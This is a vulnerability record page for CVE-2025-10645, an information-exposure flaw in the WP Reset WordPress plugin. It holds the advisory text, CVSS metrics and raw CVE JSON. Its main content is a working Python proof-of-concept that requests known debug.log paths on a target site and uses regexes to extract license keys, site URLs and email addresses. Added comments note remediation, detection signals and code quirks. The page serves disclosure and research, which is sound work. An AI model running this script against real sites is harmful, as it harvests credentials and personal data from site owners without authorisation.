Security Vulnerability Report
CVE-2025-10645 CVSS 5.3 MEDIUM

CVE-2025-10645

Published: 2025-10-07 09:15:33
Last Modified: 2026-04-15 00:35:42

Description

The WP Reset plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.05 via the WF_Licensing::log() method when debugging is enabled (default). This makes it possible for unauthenticated attackers to extract sensitive license key and site data.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress WP Reset plugin <= 2.05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10645 PoC - WP Reset Plugin Sensitive Information Exposure
# Exploits the WF_Licensing::log() method that writes sensitive data to debug logs
# (classified CWE-532, sensitive information in a log file, in the report
# metadata below). The report lists all versions up to and including 2.05
# as affected when debugging is enabled. Remediation is server-side: move to
# a version later than 2.05, disable debug logging, and keep debug.log files
# out of the web-served tree or deny web access to them.
import requests
import re
import sys
from urllib.parse import urljoin


def exploit(target_url):
    """
    Exploit CVE-2025-10645: Extract sensitive license key and site data
    from WP Reset plugin debug logs.

    Args:
        target_url: base URL of the WordPress site; each candidate path in
            log_paths is joined onto it with urljoin.

    Returns:
        dict with any of the keys 'license_keys', 'site_urls', 'emails';
        empty when no candidate path returned a non-empty 200 response.

    Detection note (defender's view): every probe is a plain GET for one of
    the paths in log_paths with the fixed User-Agent set below, so web server
    access logs showing 200 responses on those paths are the signal to look
    for; a 200 there also means the log is world-readable and should be
    removed or access-controlled.
    """
    # Common debug log file paths used by WP Reset plugin
    # NOTE(review): the wordpress-popup path is not under wp-reset and looks
    # like it belongs to a different plugin; the original gives no reason for
    # listing it here.
    log_paths = [
        '/wp-content/uploads/wp-reset/debug.log',
        '/wp-content/debug.log',
        '/wp-content/plugins/wp-reset/debug.log',
        '/wp-content/uploads/wordpress-popup/log/debug.log',
    ]
    session = requests.Session()
    session.headers.update({
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-10645-PoC)',
    })
    found_data = {}
    for log_path in log_paths:
        log_url = urljoin(target_url, log_path)
        try:
            resp = session.get(log_url, timeout=10)
            # Any non-empty 200 body is taken as the log; the content itself
            # is not checked, so a catch-all 200 page would also pass here.
            if resp.status_code == 200 and len(resp.text) > 0:
                print(f"[+] Found log file at: {log_url}")
                # Extract license keys (typical patterns)
                license_patterns = [
                    r'license[_-]?key["\s:=]+([A-Za-z0-9\-_]{20,})',
                    r'license["\s:=]+"([^"]+)"',
                    r'activation[_-]?key["\s:=]+([A-Za-z0-9\-_]{20,})',
                    r'key["\s:=]+"([A-Za-z0-9\-_]{32,})"',
                ]
                # Each pattern that matches overwrites 'license_keys', so only
                # the last matching pattern's results are kept.
                for pattern in license_patterns:
                    matches = re.findall(pattern, resp.text, re.IGNORECASE)
                    if matches:
                        found_data['license_keys'] = matches
                        print(f"[+] Extracted license keys: {matches}")
                # Extract site URLs
                site_urls = re.findall(r'https?://[\w\-\.]+\.[a-z]{2,}[/\w\-\.]*', resp.text)
                if site_urls:
                    found_data['site_urls'] = list(set(site_urls))
                    print(f"[+] Extracted site URLs: {found_data['site_urls']}")
                # Extract email addresses
                emails = re.findall(r'[\w\.+-]+@[\w\-]+\.[\w\-\.]+', resp.text)
                if emails:
                    found_data['emails'] = list(set(emails))
                    print(f"[+] Extracted emails: {found_data['emails']}")
                # Stop after the first readable log.
                # NOTE(review): the collapsed source does not show this break's
                # nesting; it is placed at the found-log level here — confirm.
                break
        except requests.RequestException as e:
            # A transport error on one path is ignored and the next path tried.
            # NOTE(review): `e` is bound but never used.
            continue
    return found_data


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_wordpress_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    target = sys.argv[1]
    data = exploit(target)
    if data:
        print(f"\n[!] Sensitive data extracted successfully:")
        for key, value in data.items():
            print(f" {key}: {value}")
    else:
        # Also printed when every path failed with a transport error, since
        # exploit() swallows those and returns an empty dict.
        print("[-] No sensitive data found or target not vulnerable.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10645", "sourceIdentifier": "[email protected]", "published": "2025-10-07T09:15:32.610", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Reset plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.05 via the WF_Licensing::log() method when debugging is enabled (default). This makes it possible for unauthenticated attackers to extract sensitive license key and site data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3364169/", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-10645/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86741f4a-8700-45dd-8998-b3f0387c27ed?source=cve", "source": "[email protected]"}]}}